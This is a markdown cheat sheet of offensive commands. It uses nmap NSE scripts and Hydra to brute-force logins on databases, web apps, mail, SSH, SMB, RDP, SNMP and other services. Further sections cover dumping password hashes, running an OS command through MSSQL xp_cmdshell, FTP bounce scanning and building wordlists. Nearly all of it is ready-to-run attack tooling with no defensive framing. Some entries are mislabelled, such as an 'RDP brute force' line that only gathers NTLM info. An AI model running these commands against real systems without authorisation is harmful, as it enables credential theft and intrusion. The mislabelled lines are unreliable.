nmap-pwn.md

Network Service Brute Force Commands Collection

Database Services

MySQL

# Basic MySQL brute force
nmap --script=mysql-brute <target>

# MySQL brute force with custom credentials
nmap --script=mysql-brute --script-args userdb=/path/to/users.txt,passdb=/path/to/passwords.txt <target>

# MySQL enum
nmap -p 3306 --script mysql-enum <target>

# MySQL users enum
nmap -p 3306 --script mysql-users --script-args="mysqluser='root',mysqlpass='password'" <target>

# MySQL databases enum
nmap -p 3306 --script mysql-databases --script-args="mysqluser='root',mysqlpass='password'" <target>

# MySQL hashdump
nmap -p 3306 --script mysql-dump-hashes --script-args="username='root',password='password'" <target>

Microsoft SQL

# MS SQL brute force
nmap -p 1433 --script ms-sql-brute <target>

# MS SQL empty password check
nmap -p 1433 --script ms-sql-empty-password <target>

# MS SQL xp_cmdshell command execution (requires credentials)
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="ipconfig" <target>

# MS SQL information gathering
nmap -p 1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password <target>

# MS SQL dump hashes
nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=password <target>

PostgreSQL

# PostgreSQL brute force
nmap -p 5432 --script pgsql-brute <target>

# PostgreSQL brute force with specific credentials
nmap -p 5432 --script pgsql-brute --script-args userdb=/path/to/users.txt,passdb=/path/to/passwords.txt <target>

# PostgreSQL info gathering
nmap -p 5432 --script pgsql-info <target>

MongoDB

# MongoDB brute force
nmap -p 27017 --script mongodb-brute <target>

# MongoDB info gathering
nmap -p 27017 --script mongodb-info <target>

# MongoDB database list (no auth)
nmap -p 27017 --script mongodb-databases <target>

# MongoDB database list (with auth)
nmap -p 27017 --script mongodb-databases --script-args="mongodb-databases.username='admin',mongodb-databases.password='password'" <target>

Redis

# Redis brute force
nmap -p 6379 --script redis-brute <target>

# Redis info gathering
nmap -p 6379 --script redis-info <target>

# Redis key enumeration
nmap -p 6379 --script redis-keys <target>

Cassandra

# Cassandra brute force
nmap -p 9160 --script=cassandra-brute <target>

# Cassandra info gathering
nmap -p 9160 --script=cassandra-info <target>

Oracle

# Oracle SID enumeration
nmap -p 1521 --script oracle-sid-brute <target>

# Oracle brute force
nmap -p 1521 --script oracle-brute --script-args oracle-brute.sid=ORCL <target>

# Oracle TNS version
nmap -p 1521 --script oracle-tns-version <target>

Web Services

Tomcat

# AJP Tomcat brute force
nmap -p 8009 --script ajp-brute <target>

# Tomcat manager brute force (HTTP)
nmap -p 8080 --script http-tomcat-manager-brute <target>

# Tomcat default credentials check
nmap -p 8080 --script http-default-accounts --script-args http-default-accounts.category=web <target>

WordPress

# WordPress brute force
nmap -p 80 --script http-wordpress-brute <target>

# WordPress user enumeration
nmap -p 80 --script http-wordpress-enum <target>

Joomla

# Joomla brute force
nmap -p 80 --script http-joomla-brute <target>

Drupal

# Drupal brute force
nmap -p 80 --script http-form-brute --script-args http-form-brute.path=/drupal/,http-form-brute.method=POST,http-form-brute.form=form_id:user_login_form&name:^USER^&pass:^PASS^&op:Log+in <target>

Email Services

POP3

# POP3 brute force
nmap -sV --script=pop3-brute <target>

# POP3 capabilities check
nmap -p 110 --script pop3-capabilities <target>

# POP3 with specific credentials
nmap -p 110 --script pop3-brute --script-args userdb=/path/to/users.txt,passdb=/path/to/passwords.txt <target>

IMAP

# IMAP brute force
nmap -p 143 --script imap-brute <target>

# IMAP capabilities
nmap -p 143 --script imap-capabilities <target>

SMTP

# SMTP brute force
nmap -p 25 --script smtp-brute <target>

# SMTP user enumeration
nmap -p 25 --script smtp-enum-users <target>

# SMTP commands
nmap -p 25 --script smtp-commands <target>

Network Protocols

SNMP

# SNMP brute force (community strings)
nmap -sU --script snmp-brute <target>

# SNMP with custom communities list
nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=/path/to/communities.txt <target>

# SNMP information gathering (with known community)
nmap -sU -p 161 --script snmp-info --script-args snmp-info.community=public <target>

# SNMP system processes
nmap -sU -p 161 --script snmp-processes --script-args snmp-processes.community=public <target>

SSH

# SSH brute force
nmap -p 22 --script ssh-brute --script-args userdb=/path/to/users.txt,passdb=/path/to/passwords.txt <target>

# SSH host key enumeration
nmap -p 22 --script ssh-hostkey <target>

# SSH authorized keys
nmap -p 22 --script ssh-auth-methods <target>

SIP/VoIP

# SIP brute force
nmap -sU -p 5060 --script=sip-brute <target>

# SIP methods enumeration
nmap -sU -p 5060 --script=sip-methods <target>

RDP

# RDP brute force
nmap -p 3389 --script rdp-ntlm-info <target>

# RDP security check
nmap -p 3389 --script rdp-enum-encryption <target>

FTP

# FTP brute force
nmap -p 21 --script ftp-brute <target>

# FTP anonymous login
nmap -p 21 --script ftp-anon <target>

# FTP bounce (scan through FTP server)
nmap -b anonymous:password@<ftp_target> <scan_target>

SMB/NetBIOS

# SMB brute force
nmap -p 445 --script smb-brute <target>

# SMB OS discovery
nmap -p 445 --script smb-os-discovery <target>

# SMB security mode
nmap -p 445 --script smb-security-mode <target>

# SMB enum shares
nmap -p 445 --script smb-enum-shares <target>

# SMB enum users
nmap -p 445 --script smb-enum-users <target>

Other Services

RTSP (Media Streaming)

# RTSP URL brute force
nmap --script rtsp-url-brute -p 554 <target>

# RTSP methods
nmap --script rtsp-methods -p 554 <target>

XMPP (Jabber)

# XMPP brute force
nmap -p 5222 --script xmpp-brute <target>

# XMPP info
nmap -p 5222 --script xmpp-info <target>

IPMI

# IPMI brute force
nmap -sU -p 623 --script ipmi-brute <target>

# IPMI version and cipher suites
nmap -sU -p 623 --script ipmi-version <target>

LDAP

# LDAP brute force
nmap -p 389 --script ldap-brute <target>

# LDAP search
nmap -p 389 --script ldap-search <target>

# LDAP rootDSE
nmap -p 389 --script ldap-rootdse <target>

DNS

# DNS brute force subdomains
nmap --script dns-brute <domain>

# DNS zone transfer
nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=<domain> <target>

Useful Nmap Options

# Timing options (faster scans)
-T4  # Aggressive timing
-T5  # Insane timing (may cause unreliable results)

# Authentication options
--script-args userdb=/path/to/usernames.txt,passdb=/path/to/passwords.txt

# Output options
-oN output.txt  # Normal output to file
-oX output.xml  # XML output
-oG output.grep # Grepable output

# Additional useful options
-Pn  # Skip host discovery
-sV  # Version detection
-A   # Aggressive scan (OS detection, version detection, script scanning, and traceroute)

Creating Custom Wordlists

# Generate custom wordlist from website
cewl -d 2 -m 5 http://target.com -w wordlist.txt

# Extract words from files in current directory
grep -r -a -o "\w\{5,\}" . | sort -u > wordlist.txt

# Generate username variations
john --wordlist=names.txt --rules=Wordlist --stdout > usernames.txt

Advanced Brute Force with Hydra

# HTTP POST form
hydra -l admin -P /path/to/passwords.txt <target> http-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed"

# SSH
hydra -L /path/to/users.txt -P /path/to/passwords.txt <target> ssh

# FTP
hydra -l admin -P /path/to/passwords.txt <target> ftp

# MySQL
hydra -l root -P /path/to/passwords.txt <target> mysql

# RDP
hydra -L /path/to/users.txt -P /path/to/passwords.txt <target> rdp